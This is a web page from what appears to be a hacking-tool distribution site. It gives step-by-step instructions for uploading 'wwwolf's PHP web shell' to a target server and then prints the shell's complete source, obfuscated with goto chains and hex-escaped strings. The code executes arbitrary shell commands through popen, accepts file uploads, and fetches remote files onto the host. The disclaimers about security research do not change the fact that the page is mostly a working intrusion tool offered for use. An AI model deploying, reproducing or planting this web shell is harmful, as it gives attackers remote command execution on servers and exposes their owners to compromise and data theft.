Web Shell

wwwolf’s PHP Web Shell – Usage Guide

R00T Admin February 18, 2025 59 Views Download Now
wwwolf’s PHP Web Shell – Usage Guide
wwwolf’s PHP Web Shell – Usage Guide

wwwolf’s PHP Web Shell

wwwolf’s PHP web shell is a lightweight and reliable PHP script designed to solve common issues encountered with various web shell tools. This tool is designed to provide initial access to the target system, offering a user-friendly and flexible interface.

Features

  • Password-protected access.
  • Compatible with UNIX and Windows systems without additional changes.
  • Clears the PHP output buffer for stable and clean execution.
  • Sends form data via POST requests, working without modifying the URL.
  • Uses the current working directory by default, allowing easy identification of the system type.
  • Offers additional features like file upload and remote file fetching.
  • Quickly clears the command input field without JavaScript.

Installation and Usage

Warning: This tool is intended for security research and evaluation only. Unauthorized use is strictly prohibited!

Step 1: Download the Script

Download the script from the GitHub repository:

https://raw.githubusercontent.com/RootShelll/wwwolf-php-webshell/refs/heads/main/wwwolf-php-webshell.php

Step 2: Upload to the Server

Upload the downloaded wwwolf-php-webshell.php file to the target server’s web directory. For example:

/var/www/html/wwwolf-php-webshell.php

Step 3: Access via Web Browser

Open your browser and access the script as follows:

http://targetsite.com/wwwolf-php-webshell.php

Step 4: Password Protection (Optional)

When you open the script, if password protection is enabled, you will be prompted to enter a password. To change the default password, open the script file and find the following line:

$password = 'default_password';

Replace 'default_password' with a strong password of your choice and save the file.

Step 5: Execute Commands

After accessing the script, enter the command you want to execute in the input field and click the “Submit” button. For example:

whoami

This command will show the current username.

Step 6: File Upload

Use the script’s file upload feature to upload files to the target server:

  • Local File Upload: Click the “Choose File” button to select a file from your computer and press “Upload.”
  • Remote File Fetch: Enter the file’s URL in the “Remote File URL” field and click “Fetch.”

Step 7: Change Working Directory

To change the current working directory, enter the new directory path in the “Change Working Directory” field and click “Change.” For example:

/var/www/html/new_directory

Security and Legal Disclaimer

Important: This script is developed solely for security research and evaluation purposes. Using it for unauthorized access to systems is illegal and may lead to severe legal consequences. Please use this tool only for permitted and ethical purposes.

Resources

Conclusion

wwwolf’s PHP Web Shell is a powerful PHP script for system management and security assessments. However, avoid unethical or illegal usage.

Tip: To make the script more secure, you can add IP restrictions, strengthen password protection, or restrict access using htaccess.
Php 
<?php
/*   _________________________________________________________________________________
    |  Project: R00t-Shell.com - Php Obfuscator  2.0.15                               |
    |  Author: R00t Shell                                                             |
    |  Date: 2025-02-18 06:45:35                                                      |
    |  Website: https://r00t-shell.com                                                |
    |  Virus Total: 9581b13240796fbd9089c35ea1589289aa2a5a130510167244600f2fd59b0df9  |
    |  Description: Obfuscates PHP code to increase security and protect source code. |
    |_________________________________________________________________________________|
*/
 goto w2a1u; W8AxS: global $Iupwe, $LAzqL, $su8HJ; goto xYrM9; oENm7: $_SERVER =& $su8HJ; goto aNLGG; i8OMQ: $ND2EE = empty($_POST["\x70\141\x73\x73"]) ? '' : $_POST["\x70\x61\163\163"]; goto FWIrz; GenQp: $rCGkq = getcwd(); goto NYlVc; lNcyO: $QjWOi = empty($_POST["\146\145\164\x63\150\137\160\157\x72\x74"]) ? "\70\60" : $_POST["\146\145\164\x63\150\x5f\x70\157\162\x74"]; goto i8OMQ; B70oX: error_reporting(E_ALL); goto VIfsU; wsUBY: if (empty($UAg0I)) { goto bUhe6; } goto yWIKl; fYEbu: $njhFl = empty($_POST["\143\155\x64"]) ? '' : $_POST["\143\155\x64"]; goto U__G0; gsGPT: JB1IY: goto L8fjQ; eMC16: echo "\42\76\xd\12\x9\11\11\11\x9"; goto Mm5HS; oG4CI: $KN0pz = $rCGkq . DIRECTORY_SEPARATOR . basename($l8c8s); goto Uo9sS; PFPlK: $b8b9g = "\46\x23\71\67\x38\65\x3b\x20\72"; goto ECSZ7; ECSZ7: if (empty($UAg0I)) { goto Uxpz_; } goto TkaFO; Tf5W9: echo "\74\142\76"; goto F6FxQ; m0R3U: goto a1EAG; goto LWHPd; HJNZs: if (!@ob_end_clean()) { goto TnKfL; } goto y_BGn; mobx6: slMSQ: goto GZZK2; xYrM9: $_FILES =& $Iupwe; goto RNB6N; zgx8i: if (empty($njhFl)) { goto KTMIp; } goto Tf5W9; hEshI: @flush(); goto LfDjx; l3fXP: Xx_D3: goto zog09; bACSQ: LqKIb: goto gXcQu; WhKDV: if (ini_get("\141\154\154\x6f\167\137\x75\162\154\137\x66\x6f\x70\x65\156")) { goto gLc31; } goto E7WSv; TkaFO: if (function_exists("\150\141\x73\x68\137\150\x6d\141\x63") || function_exists("\x6d\150\141\163\x68")) { goto LqKIb; } goto mvW70; C8f_4: echo "\x9\11\11\11\x3c\146\x6f\x72\155\x20\x6d\x65\x74\x68\157\144\75\42\160\157\163\164\42\40\x61\143\164\x69\x6f\156\75\42"; goto c_JDO; u5IOa: $sCqbj .= "{$WLdXx}\x20\x46\x69\x6c\145\x20\x66\x65\x74\x63\150\151\156\x67\x20\x64\151\163\x61\142\x6c\x65\x64\40\x28\47\x61\x6c\154\x6f\x77\137\165\x72\154\137\146\x6f\x70\145\x6e\x27" . "\40\x64\151\163\141\142\x6c\145\x64\40\x61\x6e\144\40\x27\163\x74\162\145\141\x6d\x5f\163\145\x6c\x65\x63\164\50\51\47\40\155\151\163\x73\151\156\147\51\x2e\74\x62\162\x20\x2f\x3e"; goto ZZ5kI; t2dnj: if (!(ini_get("\157\x70\145\x6e\137\x62\141\x73\x65\144\151\162") && !ini_set("\x6f\x70\145\x6e\x5f\142\x61\x73\x65\x64\151\x72", ''))) { goto eCjta; } goto T5TYH; yWIKl: echo "\x9\x9\x3c\151\156\x70\165\x74\40\164\171\160\x65\75\42\x68\x69\144\x64\x65\x6e\42\40\x6e\x61\155\x65\75\42\x61\x75\x74\150\42\40\166\141\x6c\x75\145\75\x22"; goto KQ3Wf; PNxD1: $YTRzu = $rCGkq . DIRECTORY_SEPARATOR . basename($_FILES["\x75\160\x6c\x6f\141\144"]["\x6e\141\155\x65"]); goto VALaN; GZZK2: $fSDY1 = "\x66\x65\164\x63\150\137\x73\x6f\143\x6b"; goto ZxzGb; F6FxQ: D4cZ2($njhFl); goto sW7hi; EI701: echo "\11\76\xd\xa\11"; goto wsUBY; sW7hi: echo "\x3c\57\142\76\12"; goto SolZE; NYlVc: p7Wux: goto rVrwE; eMo62: function E63tO($zNLFn, $heirI, $xVZ7h, $KN0pz) { goto WW6oF; tLC69: p4xVW: goto JbeXu; tCIAD: PCini: goto ntrFp; nDE9e: if ($ZPPNE !== false) { goto DRKrS; } goto fqCFU; ZitRV: $VSHmX .= "{$b8b9g}\x20\106\x61\x69\x6c\x65\144\x20\164\157\40\157\x70\145\x6e\40\146\151\x6c\145\x20\74\x69\x3e{$KN0pz}\x3c\57\x69\x3e\74\142\162\40\57\x3e"; goto yJpNY; DmELM: if (strpos($zNLFn, "\x3a\57\57") === false) { goto UnfGW; } goto WHG2G; ntrFp: if (feof($ZPPNE)) { goto aL5xp; } goto OQ15h; fqCFU: $VSHmX = "{$b8b9g}\x20\106\x61\x69\154\x65\144\40\x74\x6f\x20\157\x70\x65\x6e\x20\125\122\114\x20\74\x69\76{$zNLFn}\72{$heirI}{$xVZ7h}\x3c\x2f\x69\76\x3c\x62\162\x20\57\76"; goto FP89g; pr_RP: DRKrS: goto Gde_G; YrDBx: $VSHmX .= "{$O37g8}\x20\x46\145\164\x63\150\x65\x64\40\x66\x69\x6c\145\x20\74\151\x3e{$KN0pz}\x3c\57\151\x3e\40\x28{$hLIKL}\40\142\x79\x74\145\163\51\74\142\x72\x20\57\76"; goto vhAiq; fY378: if ($wVZw9 !== false) { goto p4xVW; } goto ZitRV; OQ15h: $hLIKL += fwrite($wVZw9, fread($ZPPNE, 1024)); goto f23HM; JbeXu: $hLIKL = 0; goto tCIAD; EvFnC: fjq3R: goto o1Z9U; MXnLv: $zNLFn = "\x68\164\x74\160\72\57\x2f" . $zNLFn; goto EvFnC; jmbM3: $VSHmX = ''; goto DmELM; BwvmC: return $VSHmX; goto jEyO0; FP89g: goto hWa72; goto pr_RP; vrNYG: fclose($wVZw9); goto YrDBx; yJpNY: goto fNWL3; goto tLC69; y14H0: goto fjq3R; goto E4TBN; nQiku: fclose($ZPPNE); goto kD13O; o1Z9U: $ZPPNE = fopen("{$zNLFn}\72{$heirI}{$xVZ7h}", "\162\142"); goto nDE9e; WW6oF: global $b8b9g, $O37g8; goto jmbM3; Gde_G: $wVZw9 = fopen($KN0pz, "\167\x62"); goto fY378; WHG2G: $zNLFn = str_replace(array("\163\163\154\x3a\57\57", "\x74\x6c\x73\x3a\57\x2f"), "\150\x74\164\160\x73\x3a\x2f\57", $zNLFn); goto y14H0; E4TBN: UnfGW: goto MXnLv; vhAiq: fNWL3: goto nQiku; EtcYE: aL5xp: goto vrNYG; kD13O: hWa72: goto BwvmC; f23HM: goto PCini; goto EtcYE; jEyO0: } goto TPM9s; aV9j5: if (!(PBbL0($ih0yU) !== $UAg0I)) { goto LCUaM; } goto C8f_4; grR3A: if (!ini_get("\146\151\x6c\145\x5f\165\160\154\157\x61\x64\x73")) { goto F9rX7; } goto cMORo; MpfX4: IuL03: goto tdUQ2; yUgoy: qIfMP: goto ozJFV; T3wfI: if (chdir($rCGkq)) { goto p7Wux; } goto GenQp; XmRRc: goto j6AKd; goto bACSQ; sRDjX: echo "\x22\x3e\15\12\x9\11\x9\11\160\157\x72\164\x3a\40\74\151\x6e\160\x75\x74\40\x74\x79\x70\145\x3d\x22\164\145\x78\x74\x22\x20\163\151\172\145\x3d\x22\x34\42\x20\x69\x64\x3d\x22\146\145\164\x63\x68\137\x70\x6f\x72\164\42\x20\x6e\x61\x6d\x65\75\42\146\x65\164\x63\x68\x5f\x70\157\x72\164\x22\x20\166\x61\x6c\165\145\x3d\42"; goto CxCOF; TiVF2: TnKfL: goto ATgUy; fc7MQ: $rkbX5 = popen("\143\x6d\144\40\57\x43\40\x22" . $njhFl . "\x22\40\62\x3e\x26\61", "\162"); goto m0R3U; ATgUy: if (isset($_SERVER)) { goto GvPJ8; } goto W8AxS; PJ_11: $FVqiS = empty($_POST["\x66\145\164\x63\x68\137\x68\157\x73\164"]) ? $_SERVER["\122\105\115\x4f\124\105\137\101\x44\x44\x52"] : $_POST["\146\145\x74\143\x68\x5f\150\x6f\163\x74"]; goto eHn2h; ZxzGb: mWdbW: goto JsEQh; ozJFV: KTMIp: goto xRTqR; MeIsy: ZvHMK: goto ji0JX; El7Jz: $WLdXx = "\46\43\71\x38\70\x38\x3b\x20\72"; goto PFPlK; lrjdf: echo "\74\160\162\x65\x3e"; goto zgx8i; SolZE: if (DIRECTORY_SEPARATOR == "\57") { goto nvLP3; } goto fc7MQ; G0vEk: $fSDY1 = ''; goto u5IOa; QAx2s: echo "\11\11\11\x9\11\74\x69\156\160\165\x74\x20\x74\171\x70\145\75\x22\160\x61\x73\x73\167\157\162\x64\x22\40\163\151\172\145\x3d\42\x31\65\42\40\156\x61\155\x65\x3d\x22\160\141\163\x73\x22\x3e\15\xa\11\11\x9\x9\11\x3c\151\156\x70\x75\164\x20\x74\x79\x70\145\75\x22\x73\x75\142\x6d\x69\x74\42\40\166\x61\154\x75\x65\75\42\123\x65\156\144\42\x3e\15\12\x9\x9\x9\11\x3c\57\x66\x6f\x72\155\x3e\15\12\x9\11\11"; goto mnLTq; hJW4h: echo "\42\76\15\xa\x9\11\x9\x9\160\141\x74\150\72\x20\74\x69\x6e\160\165\x74\x20\164\171\160\x65\x3d\42\x74\145\x78\x74\42\40\x73\x69\x7a\145\75\42\x34\60\x22\40\151\x64\75\x22\x66\145\164\143\150\x5f\x70\x61\164\150\42\40\x6e\141\155\x65\75\x22\146\145\x74\x63\150\x5f\160\x61\164\150\42\x20\166\x61\154\x75\x65\x3d\42\42\x3e\15\12\11\x9\11\x3c\57\x74\x64\x3e\74\x2f\x74\162\x3e\15\xa\11\x9"; goto gsGPT; QqXfA: F9rX7: goto OJ0QZ; Xr14_: D4CZ2($QJlWV); goto R9rqV; d6tRR: $fSDY1 = "\146\x65\164\x63\150\137\x66\x6f\160\x65\x6e"; goto PJ_11; Uo9sS: $sCqbj .= $fSDY1($FVqiS, $QjWOi, $l8c8s, $KN0pz); goto l3fXP; rwDlR: Uxpz_: goto wn_Bw; CqKml: nmYbz: goto t2dnj; GK8PB: ini_set("\144\151\163\x70\x6c\x61\x79\x5f\x65\x72\x72\x6f\162\x73", "\61"); goto B70oX; aNLGG: GvPJ8: goto IKX4B; ll3ji: echo "\xd\xa\74\x66\157\162\x6d\40\155\145\164\x68\x6f\144\x3d\x22\x70\157\x73\164\x22\40\x61\x63\x74\x69\157\x6e\75\42"; goto Xr14_; odj2U: echo "\x9\x3c\164\141\142\x6c\145\40\x62\x6f\162\144\x65\x72\75\42\60\42\76\xd\xa\11\x9"; goto waS6i; mvW70: $sCqbj .= "{$WLdXx}\x20\x41\x75\x74\150\x65\x6e\x74\151\143\141\164\x69\157\x6e\x20\144\151\x73\x61\142\x6c\x65\x64\40\50\47\155\x68\x61\163\150\x28\x29\47\40\155\x69\x73\x73\x69\x6e\147\51\x2e\x3c\142\162\40\x2f\76"; goto XmRRc; t5llY: echo "\x3c\160\x3e{$sCqbj}\74\57\160\76"; goto vc2FJ; w2a1u: $BGGzk = ''; goto GpXBG; TPM9s: function BLrbs($zNLFn, $heirI, $xVZ7h, $KN0pz) { goto UsFBa; cN7oR: $L1zcR = ''; goto puIvH; mtDms: fclose($K9NhA); goto elrIL; YT1xp: $NkqVS = NULL; goto hZ5C2; kCgQs: Y2ai9: goto cN7oR; U84Ip: $VSHmX = ''; goto Se276; elrIL: $VSHmX .= "{$O37g8}\x20\x46\145\x74\143\x68\145\x64\40\x66\151\x6c\145\40\x3c\x69\76{$KN0pz}\74\57\x69\76\x20\50" . strlen($L1zcR) . "\40\142\x79\164\145\x73\51\74\142\162\40\x2f\x3e"; goto NxjZc; L6T1j: m_Qg6: goto lIX0s; uE6Dh: Lz5VZ: goto skt6_; ZTtlk: $VSHmX .= "{$b8b9g}\x20\x46\141\x69\x6c\145\144\40\164\x6f\x20\157\160\145\x6e\x20\146\x69\154\x65\x20\x3c\151\x3e{$KN0pz}\74\x2f\x69\x3e\74\142\162\40\57\x3e"; goto ygov5; PpdEf: return $VSHmX; goto aTQ13; hZ5C2: $ft9dz = NULL; goto dqpBD; UsFBa: global $b8b9g, $O37g8; goto U84Ip; ygov5: goto HN4Pj; goto kCgQs; XuoAz: goto Gp_TU; goto L6T1j; Z14fd: yZ7iO: goto PpdEf; O_E1N: $A5oyf = fsockopen($zNLFn, $heirI); goto x1C6Z; AcmDy: if (!(stream_select($LHkKf, $NkqVS, $ft9dz, 5) && !feof($A5oyf))) { goto m_Qg6; } goto EPJLH; EPJLH: $L1zcR .= fread($A5oyf, 1024); goto XuoAz; BikyS: Gp_TU: goto AcmDy; x1C6Z: if ($A5oyf) { goto Lz5VZ; } goto BvXM3; lIX0s: $L1zcR = substr($L1zcR, strpos($L1zcR, "\15\12\xd\12") + 4); goto KxpfR; Se276: $zNLFn = str_replace("\x68\164\x74\x70\163\x3a\x2f\x2f", "\164\x6c\x73\72\x2f\57", $zNLFn); goto O_E1N; x3Ymh: fclose($A5oyf); goto Z14fd; GzbzH: goto yZ7iO; goto uE6Dh; skt6_: $K9NhA = fopen($KN0pz, "\167\x62"); goto T37B_; puIvH: $LHkKf = array($A5oyf); goto YT1xp; dqpBD: fwrite($A5oyf, "\x47\105\x54\40{$xVZ7h}\x20\110\124\124\120\x2f\61\x2e\60\15\xa\xd\xa"); goto BikyS; T37B_: if ($K9NhA) { goto Y2ai9; } goto ZTtlk; BvXM3: $VSHmX .= "{$b8b9g}\40\x46\141\151\154\145\x64\x20\164\157\x20\143\157\x6e\156\145\143\x74\x20\x74\x6f\40\x3c\x69\76{$zNLFn}\72{$heirI}\74\57\151\76\74\142\162\40\57\76"; goto GzbzH; KxpfR: fwrite($K9NhA, $L1zcR); goto mtDms; NxjZc: HN4Pj: goto x3Ymh; aTQ13: } goto bcrqw; rVrwE: if (!(!empty($fSDY1) && !empty($l8c8s))) { goto Xx_D3; } goto oG4CI; ji0JX: hUzop: goto ll3ji; eHn2h: $l8c8s = empty($_POST["\146\145\x74\143\x68\137\160\x61\164\150"]) ? '' : $_POST["\146\x65\164\143\x68\x5f\160\141\164\150"]; goto lNcyO; cMORo: echo "\x9\x9\11\x9\x3c\x62\76\x55\160\154\157\141\144\72\x3c\x2f\142\x3e\40\74\x69\x6e\x70\165\x74\40\x74\x79\x70\145\75\x22\146\151\x6c\145\42\40\151\144\75\42\x75\160\154\157\x61\x64\42\x20\x6e\x61\155\x65\x3d\42\165\160\x6c\157\141\144\x22\x3e\15\12\x9\x9\11"; goto QqXfA; tCxAK: $sCqbj = ''; goto eOYxT; X0Y1d: $sCqbj .= "{$O37g8}\x20\x55\160\154\x6f\141\x64\x65\144\x20\146\x69\x6c\145\x20\x3c\151\76{$YTRzu}\x3c\57\x69\76\40\x28" . $_FILES["\165\160\x6c\157\141\144"]["\163\x69\172\145"] . "\x20\x62\x79\164\x65\x73\x29\74\142\x72\x20\x2f\76"; goto MeIsy; P08c7: echo "\x22\x3e\15\12\x9\x9\74\57\164\x64\x3e\74\x2f\164\162\76\15\xa\x9\x9\74\x74\x72\76\x3c\x74\144\76\15\xa\11\x9\x3c\57\164\x64\x3e\74\164\144\76\xd\xa\11\11\x9\x3c\163\x75\160\76\74\x61\40\x68\162\x65\146\x3d\42\43\42\40\x6f\156\x63\154\x69\x63\x6b\x3d\42\143\155\144\56\166\x61\154\x75\x65\75\47\x27\x3b\x20\x63\155\144\56\x66\157\143\165\163\x28\x29\x3b\40\x72\145\164\165\162\156\x20\x66\x61\x6c\x73\x65\x3b\42\76\103\154\145\x61\x72\40\x63\155\x64\x3c\57\141\x3e\x3c\x2f\x73\165\160\x3e\xd\12\11\11\x3c\57\164\144\76\74\x2f\164\x72\76\xd\12\x9\11\74\x74\x72\76\74\x74\144\x20\143\157\154\x73\x70\x61\156\x3d\42\x32\42\40\x73\x74\171\154\145\x3d\42\164\145\x78\x74\x2d\141\154\151\147\x6e\72\40\x63\145\156\x74\145\x72\73\42\x3e\15\xa\x9\x9\x9\74\x69\156\160\165\164\x20\164\171\x70\x65\x3d\42\x73\165\x62\155\x69\x74\x22\40\x76\x61\154\x75\x65\x3d\x22\105\170\145\x63\165\164\x65\x22\40\x73\164\x79\x6c\x65\75\42\164\145\170\x74\x2d\141\154\151\147\156\x3a\40\x72\151\x67\150\x74\x3b\42\76\15\12\11\11\x3c\x2f\x74\144\76\x3c\57\x74\x72\x3e\15\xa\x9\74\x2f\164\141\142\x6c\145\76\xd\12\11\xd\xa\74\57\x66\157\x72\x6d\76\xd\12\74\x68\162\40\57\x3e\15\xa\15\12"; goto rJZh2; d58dX: ini_set("\141\x6c\154\x6f\167\x5f\165\162\x6c\x5f\146\x6f\x70\x65\156", "\61"); goto WhKDV; T5TYH: $sCqbj .= "{$WLdXx}\40\157\160\x65\156\137\142\141\x73\x65\144\151\x72\x20\75\40" . ini_get("\157\x70\145\156\137\x62\x61\163\145\144\151\x72") . "\74\x62\x72\40\57\76"; goto dmuEs; Mm5HS: D4cZ2($BGGzk); goto QAx2s; gpYIb: echo "\x9\11\x65\x6e\x63\164\x79\x70\x65\x3d\x22\x6d\165\154\x74\x69\x70\141\x72\x74\57\146\x6f\162\155\55\144\x61\x74\x61\x22\15\xa\x9"; goto zHp8u; mnLTq: exit; goto SVJEI; IKX4B: $ih0yU = ''; goto fYEbu; lNmL2: function pBbl0($A5oyf) { goto DxH1Z; PeDUE: if (function_exists("\150\x61\x73\150\x5f\x68\x6d\141\143")) { goto FvA9C; } goto D268b; uhVyS: goto miNp0; goto coPQH; vBbmt: return hash_hmac("\x73\150\x61\x32\x35\66", $A5oyf, $BGGzk); goto kqT9y; coPQH: FvA9C: goto vBbmt; D268b: return bin2hex(mhash(MHASH_SHA256, $A5oyf, $BGGzk)); goto uhVyS; kqT9y: miNp0: goto b1prA; DxH1Z: global $BGGzk; goto PeDUE; b1prA: } goto eMo62; waS6i: if (empty($fSDY1)) { goto JB1IY; } goto thje6; xKCx7: a1EAG: goto KnnnJ; JsEQh: gLc31: goto MpfX4; SVJEI: LCUaM: goto GINyy; GpXBG: $UAg0I = ''; goto uYeXN; xRTqR: echo "\74\x2f\x70\162\x65\x3e"; goto ryZai; VALaN: if (!move_uploaded_file($_FILES["\165\160\x6c\157\x61\144"]["\x74\x6d\160\137\x6e\x61\155\x65"], $YTRzu)) { goto ZvHMK; } goto X0Y1d; dmuEs: eCjta: goto T3wfI; zog09: if (!(ini_get("\146\151\x6c\145\x5f\x75\160\x6c\x6f\141\144\163") && !empty($_FILES["\x75\x70\154\x6f\x61\144"]))) { goto hUzop; } goto PNxD1; iw7CW: $rkbX5 = popen("\145\170\x65\143\x20\62\76\x26\x31\73\40" . $njhFl, "\x72"); goto xKCx7; bcrqw: ini_set("\x6c\157\147\x5f\x65\162\x72\x6f\x72\163", "\x30"); goto GK8PB; KnnnJ: QIZ8x: goto hcF43; ZZ5kI: goto mWdbW; goto mobx6; Or_Pd: D4Cz2($njhFl); goto P08c7; L8fjQ: echo "\11\11\x3c\x74\x72\76\x3c\164\144\x3e\15\12\11\x9\x9\74\142\x3e\x43\127\104\72\74\x2f\x62\x3e\15\12\x9\11\74\x2f\x74\144\x3e\74\164\x64\76\15\12\x9\11\11\x3c\x69\x6e\x70\165\x74\40\164\171\160\x65\x3d\x22\164\x65\170\x74\x22\40\163\x69\172\x65\x3d\x22\65\60\42\x20\x69\144\75\x22\x63\x77\144\42\x20\156\141\x6d\145\75\42\143\167\x64\x22\x20\166\x61\x6c\x75\x65\75\x22"; goto PIQX6; zzA4E: bUhe6: goto odj2U; SEM4r: ini_set("\x66\151\x6c\x65\137\165\160\154\x6f\141\x64\163", "\x31"); goto av9rp; OJ0QZ: echo "\11\x9\74\57\164\144\76\x3c\57\164\162\x3e\15\12\x9\11\74\x74\x72\76\74\x74\x64\76\15\12\11\11\11\x3c\x62\76\103\x6d\144\x3a\74\57\142\76\xd\xa\11\x9\x3c\x2f\164\144\76\x3c\x74\144\76\15\xa\11\11\11\x3c\151\x6e\160\x75\164\40\164\171\x70\145\x3d\42\164\x65\170\x74\x22\x20\x73\151\172\145\75\x22\x38\x30\x22\x20\x69\144\x3d\42\143\x6d\x64\x22\x20\x6e\141\155\145\x3d\42\x63\155\144\x22\x20\166\141\154\165\145\x3d\x22"; goto Or_Pd; IUWzb: d4Cz2($FVqiS); goto sRDjX; vc2FJ: c75em: goto lrjdf; LfDjx: goto QIZ8x; goto yUgoy; eOYxT: $O37g8 = "\46\43\x39\67\x38\66\x3b\40\x3a"; goto El7Jz; FWIrz: $QJlWV = $_SERVER["\x52\105\x51\x55\105\123\x54\x5f\x55\x52\111"]; goto tCxAK; R9rqV: echo "\x22\xd\12\11"; goto WKcLR; E7WSv: if (function_exists("\x73\x74\x72\145\x61\x6d\137\163\x65\x6c\x65\143\164")) { goto slMSQ; } goto G0vEk; TBx_Q: echo "\x22\76\xd\12\x9"; goto zzA4E; HHSYm: echo htmlspecialchars(fread($rkbX5, 4096), ENT_QUOTES); goto hEshI; av9rp: if (ini_get("\146\x69\154\145\x5f\x75\160\x6c\x6f\141\144\163")) { goto VtcWz; } goto qW6n6; WKcLR: if (!ini_get("\146\151\154\x65\137\165\160\154\x6f\x61\144\x73")) { goto Kdq5X; } goto gpYIb; rJZh2: if (empty($sCqbj)) { goto c75em; } goto t5llY; hcF43: if (feof($rkbX5)) { goto qIfMP; } goto HHSYm; RNB6N: $_POST =& $LAzqL; goto oENm7; KQ3Wf: d4Cz2($ih0yU); goto TBx_Q; c_JDO: d4cz2($QJlWV); goto eMC16; U__G0: $rCGkq = empty($_POST["\143\x77\144"]) ? getcwd() : $_POST["\x63\167\x64"]; goto d6tRR; thje6: echo "\11\11\11\x3c\164\x72\76\74\164\144\76\xd\xa\x9\11\x9\11\74\142\76\x46\x65\x74\x63\x68\x3a\74\x2f\x62\x3e\xd\12\11\x9\x9\x3c\x2f\x74\x64\x3e\x3c\164\x64\x3e\15\xa\11\x9\x9\x9\150\x6f\163\164\72\x20\74\151\x6e\160\165\x74\40\164\171\160\145\x3d\x22\x74\145\170\x74\x22\x20\x73\151\172\145\x3d\42\x31\x35\x22\40\x69\144\x3d\42\146\145\164\143\150\x5f\x68\157\163\x74\42\x20\156\x61\x6d\145\75\x22\x66\x65\x74\143\150\x5f\150\x6f\163\164\42\x20\166\141\154\x75\x65\x3d\42"; goto IUWzb; tdUQ2: if (ini_get("\146\151\154\x65\137\165\160\154\157\x61\x64\x73")) { goto nmYbz; } goto SEM4r; zHp8u: Kdq5X: goto EI701; GINyy: j6AKd: goto rwDlR; wn_Bw: if (ini_get("\x61\154\154\x6f\x77\137\165\162\x6c\137\146\157\160\145\x6e")) { goto IuL03; } goto d58dX; VIfsU: dsXcb: goto HJNZs; CxCOF: D4cZ2($QjWOi); goto hJW4h; NIstY: echo "\x22\x3e\xd\xa\11\11\x9"; goto grR3A; qW6n6: $sCqbj .= "{$WLdXx}\x20\106\x69\x6c\x65\x20\x75\x70\x6c\157\x61\144\163\40\x64\x69\163\141\142\154\x65\x64\56\x3c\142\162\40\x2f\x3e"; goto riGIi; uYeXN: function D4CZ2($A5oyf) { echo htmlspecialchars($A5oyf, ENT_QUOTES); } goto lNmL2; riGIi: VtcWz: goto CqKml; gXcQu: $ih0yU = empty($_POST["\141\x75\x74\150"]) ? PBBl0($ND2EE) : $_POST["\141\x75\x74\x68"]; goto aV9j5; LWHPd: nvLP3: goto iw7CW; PIQX6: d4Cz2($rCGkq); goto NIstY; y_BGn: goto dsXcb; goto TiVF2; ryZai: exit;
Warning: The content shared on this site is for informational and educational purposes only. Any responsibility that may arise from the use of the sharing belongs entirely to the user. The site management is not responsible for the misuse of the content.
#cybersecurity#ethical hacking#etik hacker#PHP betiği#PHP script#PHP Web Shell#shell script#siber güvenlik#sistem güvenliği#system security#web shell kullanımı#web shell usage#wwwolf
R00t-Shell

R00T Admin

We are happy to compile and provide you with the highest quality php shell files and hacking tools. If you like our posts, please recommend us to your friends and share us.